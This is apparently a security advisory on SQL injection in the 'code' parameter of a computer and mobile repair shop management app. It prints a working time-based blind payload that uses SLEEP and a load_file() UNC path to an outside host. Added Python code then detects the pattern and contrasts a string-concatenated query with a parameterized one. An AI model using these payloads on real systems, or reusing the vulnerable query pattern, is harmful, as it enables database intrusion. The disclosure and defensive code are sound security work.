RSMS-1.0
Vendor
Description:
The code parameter of the /rsms/ node app in Computer and Mobile Repair Shop Management-1.0 appears to be vulnerable to SQL injection.
The payload '+(select load_file('\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\kie'))+' was submitted in the code parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC path pointing at a host on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
An attacker could thereby take control of the administrator account on this system.
[+] Payloads:
---
Parameter: code (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=view_status&code=202778'+(select load_file('\\\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\\kie'))+'' AND (SELECT 6180 FROM (SELECT(SLEEP(3)))nbQu) AND 'yOvj'='yOvj
---
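As an added illustration, not code from the RSMS project or from this advisory, the following Python shows two defender-side pieces: a query-string inspector that flags the techniques combined in the payload above (a SLEEP() time delay, a load_file() read, a UNC path, and a quote that closes the string literal ahead of a boolean operator), and the string-concatenated query pattern that makes such input effective beside the parameter-bound version that neutralizes it. The table name repair_status, its columns, the sample request strings and the attacker.example host are all constructed assumptions; the lookup runs against an in-memory SQLite table rather than the application's MySQL database, so the MySQL-only functions are matched as text, never executed.

```python
"""Added example (not code from the RSMS project or the advisory author):
detection of the injection pattern in request query strings, and the
parameterized-query fix that makes such input inert. Table layout, column
names, host name and the sample request strings are constructed assumptions."""
import re
import sqlite3
from urllib.parse import parse_qs

# Each rule covers one technique present in the advisory's payload:
# a MySQL time delay, an out-of-band load_file() read, a UNC path, and a
# quote that closes the string literal before a boolean operator.
INDICATORS = {
    "time_based_sleep": re.compile(r"\bsleep\s*\(", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "unc_path": re.compile(r"\\\\[\w.-]+\\"),          # \\host\share
    "quote_then_boolean": re.compile(r"'\s*(?:and|or)\s", re.I),
}

# Constructed sample query strings; attacker.example is a placeholder host.
SAMPLE_REQUESTS = [
    "page=view_status&code=202778",
    r"page=view_status&code=202778'+(select load_file('\\\\attacker.example\\kie'))+''"
    r" AND (SELECT 6180 FROM (SELECT(SLEEP(3)))nbQu) AND 'yOvj'='yOvj",
]


def inspect_query_string(qs):
    """Return {parameter: sorted indicator names} for parameters that trip a rule."""
    hits = {}
    # parse_qs URL-decodes each value ('+' becomes a space), so the rules
    # run on what the application itself would see.
    for name, values in parse_qs(qs, keep_blank_values=True).items():
        for value in values:
            matched = {rule for rule, rx in INDICATORS.items() if rx.search(value)}
            if matched:
                hits.setdefault(name, set()).update(matched)
    return {name: sorted(rules) for name, rules in hits.items()}


def build_demo_db():
    """In-memory stand-in for the repair-status table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE repair_status (code TEXT PRIMARY KEY, status TEXT)")
    conn.executemany("INSERT INTO repair_status VALUES (?, ?)",
                     [("202778", "in progress"), ("202779", "ready for pickup")])
    return conn


def lookup_status_vulnerable(conn, code):
    """The flawed pattern: user input concatenated straight into the SQL text."""
    return conn.execute(
        "SELECT code, status FROM repair_status WHERE code = '" + code + "'"
    ).fetchall()


def lookup_status_fixed(conn, code):
    """The fix: the value is bound as a parameter and cannot alter the query."""
    return conn.execute(
        "SELECT code, status FROM repair_status WHERE code = ?", (code,)
    ).fetchall()


if __name__ == "__main__":
    for qs in SAMPLE_REQUESTS:
        print(qs[:40], "->", inspect_query_string(qs) or "clean")
    db = build_demo_db()
    tautology = "' OR '1'='1"   # classic always-true fragment, constructed
    print("vulnerable:", lookup_status_vulnerable(db, tautology))  # every row leaks
    print("fixed:     ", lookup_status_fixed(db, tautology))       # nothing matches
```

The inspector is a triage aid for web or WAF logs, not a replacement for the fix: the only durable mitigation is binding the code value as a query parameter (or equivalently using a prepared statement in the application's database layer), which turns the whole payload into a literal that matches no row.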
